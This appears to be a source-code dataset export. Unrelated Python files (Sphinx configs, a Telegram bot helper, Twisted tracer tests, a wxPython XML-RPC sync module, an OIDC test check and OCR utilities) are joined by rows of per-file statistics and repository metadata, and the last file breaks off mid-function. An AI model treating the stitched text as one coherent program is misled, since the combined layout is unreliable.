# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
master_doc,
"saltenv",
"saltenv Documentation",
[author],
1,
)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"saltenv",
"saltenv Documentation",
author,
"saltenv",
"One line description of project.",
"Miscellaneous",
),
]
# -- Extension configuration -------------------------------------------------
| 34.996226
| 133
| 0.667026
| 1,194
| 9,274
| 5.083752
| 0.335846
| 0.011862
| 0.016804
| 0.012356
| 0.212191
| 0.177595
| 0.148929
| 0.148929
| 0.148929
| 0.120593
| 0
| 0.006962
| 0.163683
| 9,274
| 264
| 134
| 35.128788
| 0.775658
| 0.684494
| 0
| 0.126214
| 0
| 0
| 0.249911
| 0.015709
| 0
| 0
| 0
| 0.003788
| 0
| 1
| 0
| false
| 0
| 0.019417
| 0
| 0.019417
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
349b663f81956d7e9257fe5e42ee283abd8a9e68
| 2,094
|
py
|
Python
|
utils.py
|
momskidvaava/firefoxbot
|
1ed85e4f6594b144ceabdecb19e6e022180e639e
|
[
"MIT"
] | null | null | null |
utils.py
|
momskidvaava/firefoxbot
|
1ed85e4f6594b144ceabdecb19e6e022180e639e
|
[
"MIT"
] | null | null | null |
utils.py
|
momskidvaava/firefoxbot
|
1ed85e4f6594b144ceabdecb19e6e022180e639e
|
[
"MIT"
] | 1
|
2021-11-25T14:05:25.000Z
|
2021-11-25T14:05:25.000Z
|
import datetime
import typing
import localization
from configurator import Config
def get_restriction_time(string: str) -> typing.Optional[int]:
"""
Get user restriction time in seconds
:param string: string to check for multiplier. The last symbol should be one of:
"m" for minutes, "h" for hours and "d" for days
:return: number of seconds to restrict or None if error
"""
if len(string) < 2:
return None
letter = string[-1]
try:
number = int(string[:-1])
except TypeError:
return None
else:
if letter == "m":
return 60 * number
elif letter == "h":
return 3600 * number
elif letter == "d":
return 86400 * number
else:
return None
def get_report_comment(message_date: datetime.datetime, message_id: int, report_message: typing.Optional[str]) -> str:
"""
Generates a report message for admins
:param message_date: Datetime when reported message was sent
:param message_id: ID of that message
:param report_message: An optional note for admins so that they can understand what's wrong
:return: A report message for admins in report chat
"""
msg = localization.get_string("report_message").format(
date=message_date.strftime(localization.get_string("report_date_format")),
chat_id=get_url_chat_id(int(Config.GROUP_MAIN)),
msg_id=message_id)
if report_message:
msg += localization.get_string("report_note").format(note=report_message)
return msg
def get_url_chat_id(chat_id: int) -> int:
"""
Well, this value is a "magic number", so I have to explain it a bit.
I don't want to use hardcoded chat username, so I just take its ID (see "group_main" variable above),
add id_compensator and take a positive value. This way I can use https://t.me/c/{chat_id}/{msg_id} links,
which don't rely on chat username.
:param chat_id: chat_id to apply magic number to
:return: chat_id for t.me links
"""
return abs(chat_id+1_000_000_000_000)
| 33.238095
| 118
| 0.668577
| 308
| 2,094
| 4.405844
| 0.392857
| 0.039794
| 0.046426
| 0.05969
| 0.078113
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017089
| 0.245463
| 2,094
| 62
| 119
| 33.774194
| 0.841772
| 0.430755
| 0
| 0.16129
| 0
| 0
| 0.041894
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.129032
| 0
| 0.483871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a1337c8f6d2a9a081a7f61b09a68afa8480561
| 7,374
|
py
|
Python
|
theseus/test/test_tracer.py
|
pexip/os-python-theseus
|
3093edd7bc4af5556bce42c8602685010c695183
|
[
"0BSD"
] | 1
|
2016-04-27T07:58:20.000Z
|
2016-04-27T07:58:20.000Z
|
theseus/test/test_tracer.py
|
pexip/os-python-theseus
|
3093edd7bc4af5556bce42c8602685010c695183
|
[
"0BSD"
] | null | null | null |
theseus/test/test_tracer.py
|
pexip/os-python-theseus
|
3093edd7bc4af5556bce42c8602685010c695183
|
[
"0BSD"
] | null | null | null |
from cStringIO import StringIO
import inspect
import textwrap
import pytest
from twisted.internet import defer, task
from theseus._tracer import Function, Tracer
class FakeCode(object):
def __init__(self, filename='', name='', flags=0):
self.co_filename = filename
self.co_name = name
self.co_flags = flags
class FakeFrame(object):
def __init__(self, code=FakeCode(), back=None, globals={}, locals={}):
self.f_code = code
self.f_back = back
self.f_globals = globals
self.f_locals = locals
class FakeFunction(object):
def __init__(self, code=FakeCode()):
self.func_code = code
def test_function_of_frame():
"""
Function.of_frame examines a frame's code for its filename and code name.
"""
frame = FakeFrame(FakeCode('spam', 'eggs'))
assert Function.of_frame(frame) == ('spam', 'eggs')
def test_do_not_trace_non_deferred_returns():
"""
If a function returns a non-Deferred value, nothing happens. More
specifically, no function trace information is stored.
"""
t = Tracer()
t._trace(FakeFrame(), 'return', None)
assert not t._function_data
def test_do_not_trace_generators():
"""
If a generator function returns a Deferred, nothing happens. More
specifically, no function trace information is stored.
"""
t = Tracer()
t._trace(
FakeFrame(FakeCode(flags=inspect.CO_GENERATOR)),
'return', defer.Deferred())
assert not t._function_data
def test_do_not_trace_defer_module():
"""
If a function in twisted.internet.defer returns a Deferred, nothing
happens. More specifically, no function trace information is stored.
"""
t = Tracer()
t._trace(
FakeFrame(globals={'__name__': 'twisted.internet.defer'}),
'return', defer.Deferred())
assert not t._function_data
_frame_spam = FakeFrame(FakeCode('spam.py', 'spam'))
_frame_eggs = FakeFrame(FakeCode('eggs.py', 'eggs'), _frame_spam)
_frame_unwindGenerator = FakeFrame(
FakeCode('defer.py', 'unwindGenerator'),
_frame_eggs,
{'__name__': 'twisted.internet.defer'},
{'f': FakeFunction(FakeCode('sausage.py', 'sausage'))})
def test_trace_deferred_return_initial_setup():
"""
If a function returns a Deferred, nothing happens until the Deferred
fires. More specifically, no function trace information is stored.
"""
t = Tracer()
d = defer.Deferred()
t._trace(_frame_spam, 'return', d)
assert not t._function_data
def _trace_deferred_firing_after(clock, tracer, frame, seconds):
"""
Helper function to advance a clock and fire a Deferred.
"""
d = defer.Deferred()
tracer._trace(frame, 'call', None)
tracer._trace(frame, 'return', d)
clock.advance(seconds)
d.callback(None)
def test_trace_deferred_return():
"""
If a function returns a Deferred, after that Deferred fires, function trace
information is stored regarding the amount of time it took for that
Deferred to fire.
"""
clock = task.Clock()
t = Tracer(reactor=clock)
_trace_deferred_firing_after(clock, t, _frame_spam, 1.5)
assert t._function_data == {
('spam.py', 'spam'): ({}, 1500000),
}
def test_trace_deferred_return_with_caller():
"""
If the function returning the Deferred has a frame above it, that
information is stored as well.
"""
clock = task.Clock()
t = Tracer(reactor=clock)
_trace_deferred_firing_after(clock, t, _frame_eggs, 1.5)
assert t._function_data == {
('spam.py', 'spam'): ({
('eggs.py', 'eggs'): (1, 1500000),
}, 0),
('eggs.py', 'eggs'): ({}, 1500000),
}
def test_trace_deferred_return_with_multiple_calls():
"""
If the function(s) returning the Deferred(s) are called multiple times, the
timing data is summed.
"""
clock = task.Clock()
t = Tracer(reactor=clock)
_trace_deferred_firing_after(clock, t, _frame_spam, 0.5)
_trace_deferred_firing_after(clock, t, _frame_spam, 0.25)
_trace_deferred_firing_after(clock, t, _frame_eggs, 0.125)
assert t._function_data == {
('spam.py', 'spam'): ({
('eggs.py', 'eggs'): (1, 125000),
}, 750000),
('eggs.py', 'eggs'): ({}, 125000),
}
def test_trace_inlineCallbacks_detection():
"""
Tracer will detect the use of inlineCallbacks and rewrite the call stacks
to look better and contain more information.
"""
clock = task.Clock()
t = Tracer(reactor=clock)
_trace_deferred_firing_after(clock, t, _frame_unwindGenerator, 0.5)
assert t._function_data == {
('spam.py', 'spam'): ({
('eggs.py', 'eggs'): (1, 500000),
}, 0),
('eggs.py', 'eggs'): ({
('sausage.py', 'sausage'): (1, 500000),
}, 0),
('sausage.py', 'sausage'): ({}, 500000),
}
def test_tracer_calltree_output():
"""
Tracer's write_data method writes out calltree-formatted information.
"""
clock = task.Clock()
t = Tracer(reactor=clock)
_trace_deferred_firing_after(clock, t, _frame_spam, 0.5)
_trace_deferred_firing_after(clock, t, _frame_spam, 0.25)
_trace_deferred_firing_after(clock, t, _frame_eggs, 0.125)
sio = StringIO()
t.write_data(sio)
assert sio.getvalue() == textwrap.dedent("""\
events: Nanoseconds
fn=eggs eggs.py
0 125000
fn=spam spam.py
0 750000
cfn=eggs eggs.py
calls=1 0
0 125000
""")
class FakeSys(object):
tracer = None
def setprofile(self, trace):
self.tracer = trace
def getprofile(self):
return self.tracer
@pytest.fixture
def fakesys(monkeypatch):
fakesys = FakeSys()
monkeypatch.setattr('theseus._tracer.sys', fakesys)
return fakesys
def test_tracer_install(fakesys):
"""
Tracer's install method will install itself globally using sys.setprofile.
"""
t = Tracer()
t.install()
assert fakesys.tracer == t._trace
def test_tracer_wrapped_hook(fakesys):
"""
If a profile hook was set prior to calling Tracer's install method, it will
continue to be called by Tracer.
"""
calls = []
def tracer(frame, event, arg):
calls.append((frame, event, arg))
fakesys.tracer = tracer
t = Tracer()
t.install()
sentinel = object()
t._trace(sentinel, 'call', sentinel)
assert calls == [(sentinel, 'call', sentinel)]
def test_tracer_uninstall(fakesys):
"""
Tracer's install method will uninstall itself as well.
"""
t = Tracer()
t.install()
t.uninstall()
assert fakesys.tracer is None
def test_tracer_uninstall_with_other_hook(fakesys):
"""
If another profile hook was installed after the Tracer was installed, then
the profile hook will remain unchanged.
"""
t = Tracer()
t.install()
fakesys.tracer = sentinel = object()
t.uninstall()
assert fakesys.tracer is sentinel
def test_tracer_uninstall_with_other_hook_previously_installed(fakesys):
"""
If another profile hook was installed before the Tracer was installed, then
the profile hook will be restored to that profile hook.
"""
t = Tracer()
fakesys.tracer = sentinel = object()
t.install()
t.uninstall()
assert fakesys.tracer is sentinel
| 27.210332
| 79
| 0.649173
| 930
| 7,374
| 4.941935
| 0.189247
| 0.022846
| 0.04134
| 0.052219
| 0.452132
| 0.401436
| 0.353351
| 0.294822
| 0.263925
| 0.238251
| 0
| 0.019757
| 0.231218
| 7,374
| 270
| 80
| 27.311111
| 0.790968
| 0.227421
| 0
| 0.371069
| 0
| 0
| 0.096524
| 0.008136
| 0
| 0
| 0
| 0
| 0.09434
| 1
| 0.144654
| false
| 0
| 0.037736
| 0.006289
| 0.226415
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a2c4ef21ebf75e62e5e53df18db5c3d07d0336
| 1,665
|
py
|
Python
|
testdoc/conf.py
|
coding-to-music/sphinx-seo-meta-twitter
|
23ec10e32ae272d5024d2468a87813ecabd30bfa
|
[
"BSD-3-Clause"
] | null | null | null |
testdoc/conf.py
|
coding-to-music/sphinx-seo-meta-twitter
|
23ec10e32ae272d5024d2468a87813ecabd30bfa
|
[
"BSD-3-Clause"
] | null | null | null |
testdoc/conf.py
|
coding-to-music/sphinx-seo-meta-twitter
|
23ec10e32ae272d5024d2468a87813ecabd30bfa
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys, os
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinxcontrib.seometatwitter']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sphinx-seometatwitter'
copyright = u'2021'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.6.0'
# The full version, including alpha/beta/rc tags.
release = '0.6.0'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
html_theme = 'default'
html_static_path = ['_static']
# Output file base name for HTML help builder.
htmlhelp_basename = 'tweettestdoc'
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'tweettest', u'tweettest Documentation',
[u'test'], 1)
]
| 27.295082
| 80
| 0.713514
| 229
| 1,665
| 5.122271
| 0.606987
| 0.00682
| 0.005115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010745
| 0.161562
| 1,665
| 60
| 81
| 27.75
| 0.829513
| 0.681682
| 0
| 0
| 0
| 0
| 0.319444
| 0.097222
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a414f71bdbac2f19072c327b891b149dfefa34
| 6,511
|
py
|
Python
|
dash/lib/events/servermanagement.py
|
wjwwood/open-robotics-platform
|
c417f1e4e381cdbbe88ba9ad4dea3bdf9840d3d5
|
[
"MIT"
] | null | null | null |
dash/lib/events/servermanagement.py
|
wjwwood/open-robotics-platform
|
c417f1e4e381cdbbe88ba9ad4dea3bdf9840d3d5
|
[
"MIT"
] | null | null | null |
dash/lib/events/servermanagement.py
|
wjwwood/open-robotics-platform
|
c417f1e4e381cdbbe88ba9ad4dea3bdf9840d3d5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python -OO
# encoding: utf-8
###########
# ORP - Open Robotics Platform
#
# Copyright (c) 2010 John Harrison, William Woodall
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
##########
"""
servermanagement.py - Contains components related to remote server management
Created by William Woodall on 2010-11-03.
"""
__author__ = "William Woodall"
__copyright__ = "Copyright (c) 2010 John Harrison, William Woodall"
### Imports ###
# Standard Python Libraries
import sys
import os
import logging
import thread
import xmlrpclib
import copy
import traceback
# Other libraries
import lib.elements as elements
try: # try to catch any missing dependancies
# wx for window elements
PKGNAME = 'wxpython'
import wx
import wx.aui as aui
del PKGNAME
except ImportError as PKG_ERROR: # We are missing something, let them know...
sys.stderr.write(str(PKG_ERROR)+"\nYou might not have the "+PKGNAME+" \
module, try 'easy_install "+PKGNAME+"', else consult google.")
### Functions ###
def sync_files(files):
cc_files, hwm_files = files
sync_files_helper(cc_files, "files", elements.MAIN.files[0])
sync_files_helper(hwm_files, "modules", elements.MAIN.files[1])
# buildListing()
elements.MAIN.project_drawer.updateList()
def sync_files_helper(files, root_folder, base_array):
local_array = copy.deepcopy(base_array)
for file in files:
try:
path_array = file.split(os.sep)
parent_array = file_array = local_array
file_index_reference = None
try:
if len(path_array):
for x in path_array:
parent_array = file_array
file_array = file_array[x]
file_index_reference = x
except KeyError as filename_error:
pass # this is supposed to happen, we handle it below
if file_array[1] == files[file]:
# Same file,
pass
elif file_array[1] > files[file]:
# Local copy is newer
contents = open(file_array[0], 'r').read()
elements.REMOTE_SERVER.write(os.path.join(root_folder, file), contents, file_array[1])
elif file_array[1] < files[file]:
# Server Copy is newer
# this is handling the key error above
file_path = os.path.join(os.getcwd(), root_folder, file)
with open(file_path, 'w+') as fp:
fp.write(elements.REMOTE_SERVER.getFileContents(os.path.join(root_folder, file)))
os.utime(file_path, (files[file], files[file]))
del parent_array[file_index_reference]
except KeyError:
try:
if file.find(os.sep) != -1:
os.makedirs(os.path.join(os.getcwd(), root_folder, os.path.split(file)[0]))
file_path = os.path.join(os.getcwd(), root_folder, file)
with open(file_path, 'w+') as fp:
fp.write(elements.REMOTE_SERVER.getFileContents(os.path.join(root_folder, file)))
os.utime(file_path, (files[file], files[file]))
except Exception as e:
traceback.print_exc(file=sys.stdout)
walk_and_send_files(root_folder, local_array)
def walk_and_send_files(root, list):
"""Walks a hash and sends the files to the remote server."""
if isinstance(list, dict):
for file in list:
if file[0] == '.':
continue
new_root = os.path.join(root, file)
walk_and_send_files(new_root, list[file])
else:
file_handler = open(list[0], 'r')
elements.REMOTE_SERVER.write(root, file_handler.read(), list[1])
def connect(event):
"""Connects to the remote server, using the info in remote server text box"""
# Connect to the remote server
location = elements.TOOLBAR.server_addr.GetValue()
try:
elements.REMOTE_SERVER = xmlrpclib.Server('http://' + str(location) + ':7003/')
elements.REMOTE_SERVER.connect()
elements.TOOLBAR.connect_button.SetLabel('Disconnect')
elements.TOOLBAR.connect_button.Bind(wx.EVT_BUTTON, disconnect)
elements.MAIN.SetStatusText('Connected')
except Exception as error:
elements.MAIN.log.error(str(error))
return
# Activate Buttons
elements.TOOLBAR.send_button.Enable()
elements.TOOLBAR.config_button.Enable()
elements.TOOLBAR.run_button.Enable()
elements.TOOLBAR.shutdown_button.Enable()
elements.TOOLBAR.restart_button.Enable()
elements.TOOLBAR.RC_button.Enable()
# Synchronize Files
sync_files(elements.REMOTE_SERVER.fileSync())
def disconnect(event):
"""Attempts to disconnect from the remote server"""
elements.TOOLBAR.connect_button.SetLabel('Connect')
elements.TOOLBAR.send_button.Disable()
elements.TOOLBAR.run_button.Disable()
elements.TOOLBAR.shutdown_button.Disable()
elements.TOOLBAR.restart_button.Disable()
elements.TOOLBAR.connect_button.Bind(wx.EVT_BUTTON, connect)
elements.REMOTE_SERVER.disconnect()
elements.REMOTE_SERVER.remote_server = None
elements.MAIN.SetStatusText('Disconnected')
def restart(event):
"""Calls the remote server to restart"""
elements.REMOTE_SERVER.restart()
def shutdown(event):
"""Shuts down the remote server"""
elements.REMOTE_SERVER.shutdown()
disconnect(None)
| 38.526627
| 102
| 0.665643
| 836
| 6,511
| 5.055024
| 0.328947
| 0.056791
| 0.052059
| 0.031945
| 0.176763
| 0.138192
| 0.121628
| 0.096072
| 0.075722
| 0.075722
| 0
| 0.006639
| 0.236523
| 6,511
| 169
| 103
| 38.526627
| 0.843492
| 0.289971
| 0
| 0.145631
| 0
| 0
| 0.042238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067961
| false
| 0.019417
| 0.106796
| 0
| 0.184466
| 0.009709
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a4b62edf263b2fe76869067f5c2acf0eed223a
| 1,661
|
py
|
Python
|
test/uma/rp/check.py
|
rohe/oictest
|
f6f0800220befd5983b8cb34a5c984f98855d089
|
[
"Apache-2.0"
] | 32
|
2015-01-02T20:15:17.000Z
|
2020-02-15T20:46:25.000Z
|
test/uma/rp/check.py
|
rohe/oictest
|
f6f0800220befd5983b8cb34a5c984f98855d089
|
[
"Apache-2.0"
] | 8
|
2015-02-23T19:48:53.000Z
|
2016-01-20T08:24:05.000Z
|
test/uma/rp/check.py
|
rohe/oictest
|
f6f0800220befd5983b8cb34a5c984f98855d089
|
[
"Apache-2.0"
] | 17
|
2015-01-02T20:15:22.000Z
|
2022-03-22T22:58:28.000Z
|
import inspect
import sys
from uma import message
from rrtest.check import Error, get_protocol_response
from rrtest import Unknown
from oictest import check
__author__ = 'roland'
CLASS_CACHE = {}
class MatchResourceSet(Error):
"""
Verify that the returned resource set is as expected
"""
cid = "match-resource-set"
msg = ""
def _func(self, conv):
res = get_protocol_response(conv, message.ResourceSetDescription)
inst, txt = res[-1]
rset = self._kwargs["rset"]
# All but _id and _rev should be equal
for key in message.ResourceSetDescription.c_param.keys():
if key in ["_id", "_rev"]:
continue
try:
assert rset[key] == inst[key]
except AssertionError:
self._message = "Not the resource set I expected"
self._status = self.status
break
except KeyError:
try:
assert key not in rset and key not in inst
except AssertionError:
self._message = "Not the resource set I expected"
self._status = self.status
break
return {}
def factory(cid, classes=CLASS_CACHE):
if len(classes) == 0:
for name, obj in inspect.getmembers(sys.modules[__name__]):
if inspect.isclass(obj):
try:
classes[obj.cid] = obj
except AttributeError:
pass
if cid in classes:
return classes[cid]
else:
classes = {}
return check.factory(cid, classes)
| 27.683333
| 73
| 0.556291
| 181
| 1,661
| 4.966851
| 0.441989
| 0.048943
| 0.042269
| 0.068966
| 0.182425
| 0.182425
| 0.182425
| 0.182425
| 0.182425
| 0.182425
| 0
| 0.001905
| 0.367851
| 1,661
| 59
| 74
| 28.152542
| 0.854286
| 0.054184
| 0
| 0.244444
| 0
| 0
| 0.062379
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 1
| 0.044444
| false
| 0.022222
| 0.133333
| 0
| 0.311111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a59aa4fd323b18e2045c4173ab3b0589d86fd9
| 10,959
|
py
|
Python
|
lib/utils/general.py
|
yingbiaoluo/ocr_pytorch
|
7d9163f7d6d557d83e2f50a39a3219f330f0cf84
|
[
"MIT"
] | null | null | null |
lib/utils/general.py
|
yingbiaoluo/ocr_pytorch
|
7d9163f7d6d557d83e2f50a39a3219f330f0cf84
|
[
"MIT"
] | null | null | null |
lib/utils/general.py
|
yingbiaoluo/ocr_pytorch
|
7d9163f7d6d557d83e2f50a39a3219f330f0cf84
|
[
"MIT"
] | null | null | null |
import os
import cv2
import glob
import logging
import numpy as np
from pathlib import Path
import torch
from torch.autograd import Variable
import torch.distributed as dist
class strLabelConverter(object):
def __init__(self, alphabet_):
"""
字符串标签转换
"""
self.alphabet = alphabet_ + 'Ω'
self.dict = {}
for i, char in enumerate(self.alphabet):
self.dict[char] = i + 1
def encode(self, text):
length = []
result = []
for item in text:
item = item.replace(' ', '').replace('\t', '')
length.append(len(item))
for char in item:
if char not in self.alphabet:
print('char {} not in alphabets!'.format(char))
char = '-'
index = self.dict[char]
result.append(index)
text = result
return torch.IntTensor(text), torch.IntTensor(length)
def decode(self, t, length, raw=False):
"""Decode encoded texts back into strs.
Args:
torch.IntTensor [length_0 + length_1 + ... length_{n - 1}]: encoded texts.
torch.IntTensor [n]: length of each text.
Raises:
AssertionError: when the texts and its length does not match.
Returns:
text (str or list of str): texts to convert.
"""
if length.numel() == 1: # 元素个数只有一个 number of elements
length = length[0]
assert t.numel() == length, "text with length: {} does not match declared length: {}".format(t.numel(), length)
if raw:
return ''.join([self.alphabet[i - 1] for i in t])
else:
char_list = []
for i in range(length):
if t[i] != 0 and (not (i > 0 and t[i - 1] == t[i])):
char_list.append(self.alphabet[t[i] - 1])
return ''.join(char_list)
else:
# batch mode
assert t.numel() == length.sum(), "texts with length: {} does not match declared length: {}".format(t.numel(), length.sum())
texts = []
index = 0
for i in range(length.numel()):
l = length[i]
texts.append(
self.decode(
t[index:index + l], torch.IntTensor([l]), raw=raw))
index += l
return texts
class averager(object):
"""Compute average for `torch.Variable` and `torch.Tensor`. """
def __init__(self):
self.reset()
def add(self, v):
if isinstance(v, Variable):
count = v.data.numel()
v = v.data.sum()
elif isinstance(v, torch.Tensor):
count = v.numel()
v = v.sum()
self.n_count += count
self.sum += v
def reset(self):
self.n_count = 0
self.sum = 0
def val(self):
res = 0
if self.n_count != 0:
res = self.sum / float(self.n_count)
return res
def generate_alphabets(alphabet_path):
"""
读取文本标签,生成字符表。
:param alphabet_path: 文本标签.
:return: 字符表.
"""
with open(alphabet_path, 'r', encoding='utf-8') as file:
alphabet = sorted(list(set(repr(''.join(file.readlines())))))
if ' ' in alphabet:
alphabet.remove(' ')
alphabet = ''.join(alphabet)
return alphabet
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
def lev_ratio(str_a, str_b):
"""
ED距离,用来衡量单词之间的相似度
:param str_a:
:param str_b:
:return:
"""
str_a = str_a.lower()
str_b = str_b.lower()
matrix_ed = np.zeros((len(str_a) + 1, len(str_b) + 1), dtype=np.int)
matrix_ed[0] = np.arange(len(str_b) + 1)
matrix_ed[:, 0] = np.arange(len(str_a) + 1)
for i in range(1, len(str_a) + 1):
for j in range(1, len(str_b) + 1):
# 表示删除a_i
dist_1 = matrix_ed[i - 1, j] + 1
# 表示插入b_i
dist_2 = matrix_ed[i, j - 1] + 1
# 表示替换b_i
dist_3 = matrix_ed[i - 1, j - 1] + (2 if str_a[i - 1] != str_b[j - 1] else 0)
# 取最小距离
matrix_ed[i, j] = np.min([dist_1, dist_2, dist_3])
# print(matrix_ed)
levenshtein_distance = matrix_ed[-1, -1]
sum = len(str_a) + len(str_b)
levenshtein_ratio = (sum - levenshtein_distance) / sum
return levenshtein_ratio
def set_logging():
logging.basicConfig(
format="%(asctime)s %(message)s", # 指定输出的格式和内容, %(message)s: 打印日志信息
level=logging.INFO) # 设置日志级别 默认为logging.WARNING
def get_latest_run(search_dir='./runs'):
# Return path to most recent 'last.pt' in /runs (i.e. to --resume from)
last_list = glob.glob(f'{search_dir}/**/last*.pt', recursive=True)
return max(last_list, key=os.path.getctime) if last_list else ''
def check_file(file):
# Search for file if not found
if os.path.isfile(file) or file == '':
return file
else:
files = glob.glob('./**/' + file, recursive=True) # find file '**'匹配所有文件、目录、子目录和子目录里的文件
assert len(files), 'File Not Found: %s' % file # assert file was found
return files[0] # return first file if multiple found
def increment_dir(dir, comment=''):
# Increments a directory runs/exp1 --> runs/exp2_comment
n = 0 # number
dir = str(Path(dir)) # os-agnostic
d = sorted(glob.glob(dir + '*')) # directories
if len(d):
n = max([int(x[len(dir):x.find('_') if '_' in x else None]) for x in d]) + 1 # increment
return dir + str(n) + ('_' + comment if comment else '')
def xyxy2xywh(x):
# Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right
y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)
y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center
y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center
y[:, 2] = x[:, 2] - x[:, 0] # width
y[:, 3] = x[:, 3] - x[:, 1] # height
return y
def xywh2xyxy(x):
# Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)
y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x
y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y
y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x
y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y
return y
def denoise(image):
"""
对灰色图片进行降噪(注:cv2.fastNlMeansDenoising函数处理时间较长,因此不宜采用该降噪函数)
"""
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
dst = cv2.fastNlMeansDenoising(image, None, h=10, templateWindowSize=7, searchWindowSize=21)
